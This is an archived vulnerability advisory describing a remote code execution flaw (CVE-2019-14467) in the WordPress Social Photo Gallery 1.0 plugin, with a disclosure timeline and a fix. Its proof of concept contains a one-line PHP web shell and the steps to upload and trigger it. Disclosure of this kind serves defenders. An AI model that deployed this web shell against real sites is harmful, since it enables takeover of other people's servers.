what you don't know can hurt you

WordPress Social Photo Gallery 1.0 Remote Code Execution

WordPress Social Photo Gallery 1.0 Remote Code Execution
Posted Nov 15, 2019
Authored by Prestigia Seguridad

WordPress Social Gallery plugin version 1.0 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2019-14467
MD5 | 1bb9591e3cec19df6dd4e98eaea723af

WordPress Social Photo Gallery 1.0 Remote Code Execution

Change Mirror Download

=============================================
PRESTIGIA SEGURIDAD ALERT 2019-001
- Original release date: July 31, 2019
- Last revised: November 13, 2019
- Discovered by: Prestigia Seguridad
- Severity: 7,5/10 (CVSS Base Score)
- CVE-ID: CVE-2019-14467
=============================================

I. VULNERABILITY
-------------------------
WordPress Plugin Social Photo Gallery 1.0 - Remote Code Execution

II. BACKGROUND
-------------------------
Social Gallery is the ultimate lightbox plugin for WordPress. Your images
deserve to be experienced and shared, to spark a response as they travel
the social web, and to work for you by generating more fans and more Likes
for your content.

III. DESCRIPTION
-------------------------
The version of WordPress Plugin Social Photo Gallery is affected by a
Remote Code Execution vulnerability.

The application does not check the extension when a imagen of a album is
uploaded, resulting in a execution of php code.

To exploit the vulnerability only is needed create a album in the
application and attach a malicious php file in the cover photo album.

IV. PROOF OF CONCEPT
-------------------------

1. Create a .php archive (cmd.php):

<?php system($_GET['cmd']); ?>

2. Click Add Album, select the name, for example "demo" and in the "Cover
Photo" select the cmd.php file.

3. Load the next URL and magic:

http://127.0.0.1/wordpress/wp-content/uploads/socialphotogallery/demo/cmd.php?cmd=ls

V. BUSINESS IMPACT
-------------------------
Execute local commands in the server result from these attacks.

VI. SYSTEMS AFFECTED
-------------------------
WordPress Plugin Social Photo Gallery 1.0

VII. SOLUTION
-------------------------
The solution is only allow upload Digital Image Files: TIFF, JPEG, GIF, PNG

VIII. REFERENCES
-------------------------
https://wordpress.org/plugins/social-photo-gallery/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Prestigia Seguridad
Email: info@prestigiaonline.com

X. REVISION HISTORY
-------------------------
July 31, 2019 1: Initial release
November 13, 2019 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-------------------------
July 31, 2019 1: Vulnerability acquired by Prestigia Seguridad
July 31, 2019 2: Email to vendor without response
August 15, 2019 3: Second email to vendor without response
November 13, 2019 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Prestigia Seguridad
https://seguridad.prestigia.es/


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    1 Files
  • 2
    Dec 2nd
    16 Files
  • 3
    Dec 3rd
    17 Files
  • 4
    Dec 4th
    23 Files
  • 5
    Dec 5th
    11 Files
  • 6
    Dec 6th
    10 Files
  • 7
    Dec 7th
    1 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    12 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close